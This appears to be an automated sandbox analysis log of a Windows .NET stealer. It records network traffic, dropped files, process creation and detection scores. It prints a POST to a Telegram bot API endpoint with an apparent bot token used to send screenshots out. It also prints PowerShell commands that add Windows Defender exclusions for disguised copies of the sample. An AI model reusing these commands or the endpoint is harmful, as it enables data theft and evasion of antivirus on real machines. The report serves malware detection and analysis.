Source: unknown | HTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="313b427a-59e5-4849-a91a-75e00f68a976" | Host: api.telegram.org | Content-Length: 82628 | Expect: 100-continue | Connection: Keep-Alive
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE4624D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.31.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.000000000324C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000004.00000002.3359158340.00000218E52E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3375021893.0000021B53196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3420318873.00000203E2456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3163423208.000001B610076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1984514028.00000218D549A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E46F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D2609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1984514028.00000218D5271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D23E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD8F01000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002A55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1984514028.00000218D549A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E46F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D2609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.1984514028.00000218D5271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D23E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD8F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.dr | String found in binary or memory: https://api.telegram.org/bot
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhotoX
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qmgr.db.31.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46256000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE462A3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003271000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003247000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.dr | String found in binary or memory: https://ipinfo.io/country
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.dr | String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000004.00000002.3359158340.00000218E52E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3375021893.0000021B53196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3420318873.00000203E2456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3163423208.000001B610076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.31.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46256000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4WuxfupWij.29.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Windows\System32\r6Lr6XbTWt.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Windows\System32\r6Lr6XbTWt.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Windows\System32\0b28f23e034595
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9BAF1726
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9BAFF348
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 20_2_00007FFD9B6F0D48
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 20_2_00007FFD9B6F0E43
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B741768
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B710D48
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B710E43
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B720000
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 32_2_00007FFD9B710D48
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 32_2_00007FFD9B710E43
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B700000
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B6F0D48
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B6F0E43
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B72177C
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 34_2_00007FFD9B6E0D48
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 34_2_00007FFD9B6E0E43
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Code function: 35_2_00007FFD9B73170E
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Code function: 35_2_00007FFD9B710000
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 36_2_00007FFD9B71170E
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 36_2_00007FFD9B6F0000
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 36_2_00007FFD9B6E0D48
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 36_2_00007FFD9B6E0E43
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 37_2_00007FFD9B700000
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 37_2_00007FFD9B6F0D48
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 37_2_00007FFD9B6F0E43
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 37_2_00007FFD9B72177C
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 39_2_00007FFD9B710000
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 39_2_00007FFD9B73170E
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 40_2_00007FFD9B6F0000
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 40_2_00007FFD9B71170E
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 40_2_00007FFD9B6E0D48
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 40_2_00007FFD9B6E0E43
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 41_2_00007FFD9B720000
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 41_2_00007FFD9B710D48
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 41_2_00007FFD9B710E43
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 41_2_00007FFD9B741768
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Code function: 42_2_00007FFD9B720D48
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Code function: 42_2_00007FFD9B720E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CEHidmAX.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
Source: VQdUvAQ4xO.exe, 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 00000024.00000002.2486417871.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 00000024.00000002.2486417871.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.0000000003581000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.0000000003592000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe, 0000002B.00000002.3049829663.000000000364F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VQdUvAQ4xO.exe
Source: VQdUvAQ4xO.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: VQdUvAQ4xO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mENvqiIeFx.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0eDO5Zbs.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: r6Lr6XbTWt.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JOajDppbSkfqSPK1G9zAbH.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/92@3/4
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\NnjhOJZu.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-4J6ByaDz5UAU0y0XiBQ1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\AppData\Local\Temp\dj5thqfb
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat"
Source: VQdUvAQ4xO.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1oyAqbnMAq.29.dr, QN844X0EE4.29.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: VQdUvAQ4xO.exe | Virustotal: Detection: 68%
Source: VQdUvAQ4xO.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File read: C:\Users\user\Desktop\VQdUvAQ4xO.exe
Source: unknown | Process created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP"
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
